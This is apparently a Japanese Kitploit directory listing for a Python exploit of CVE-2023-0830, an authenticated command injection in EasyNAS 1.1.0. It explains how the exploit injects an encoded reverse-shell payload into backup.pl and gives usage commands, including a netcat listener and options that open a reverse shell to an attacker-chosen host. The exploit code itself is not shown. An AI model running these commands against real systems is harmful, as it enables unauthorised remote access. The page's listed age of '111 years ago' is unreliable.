Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-0830 — EasyNAS バージョン 1.1.0 用のエクスプロイト。悪用される脆弱性はコマンドインジェクションの欠陥であり、認証が必要です。 | Kitploit
ツール/GitHubGitHub/xbz0n/cve-2023-0830
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

EasyNAS バージョン 1.1.0 用のエクスプロイト。悪用される脆弱性はコマンドインジェクションの欠陥であり、認証が必要です。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-0830: EasyNAS 1.1.0 認証済みOSコマンドインジェクションエクスプロイト

このPythonスクリプトは、統合リスナーを含む拡張機能を備えたEasyNASバージョン1.1.0向けの強力なエクスプロイトです。悪用される脆弱性はコマンドインジェクションの欠陥であり、認証が必要です。

このスクリプトはターゲットサーバーとのセッションを確立し、ユーザーが指定した認証情報でログインリクエストを送信します。認証に成功すると、実行時にユーザー指定のIPアドレスとポートへのリバースシェル接続を開くペイロードを構築します。このペイロードはURLエンコードおよびBase64エンコードされ、細工されたGETリクエストを介してサーバー上のbackup.plファイルに注入されます。

CVE: CVE-2023-0830

エクスプロイト作成者

Ivan Spiridonov (xbz0n) https://xbz0n.sh

ベンダーホームページ

https://www.easynas.org

機能

  • 統合リバースシェルリスナー - 別途netcatプロセスは不要
  • リスナーのIPアドレス自動検出
  • 異なるシェルタイプ(bash、sh、python)を使用するオプション
  • HTTPとHTTPSの両方をサポート
  • 外部リスナーをサポート

使用方法

統合リスナーを使用した基本的な使い方(推奨):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

外部リスナーを使用する場合(先に nc -lvnp 4444 を起動):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

オプション:

root@kitploit:~
--mode {shell,reverse}    Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS        IP address for the reverse shell listener (auto-detected by default)
--lport PORT              Port for the reverse shell listener (default: 4444)
--protocol {http,https}   Protocol to use (default: https)
--verbose                 Enable verbose output
--shell {bash,sh,python}  Specify the shell type to use with integrated listener (default: bash)

依存関係

  • Python 3
  • Requestsライブラリ

免責事項

このスクリプトは教育目的および許可を得たペネトレーションテスト専用です。ネットワークまたはシステムに対してペネトレーションテストを実行する前に、必ず明示的な許可を求めてください。

責任を持って使用してください。

ツールをダウンロード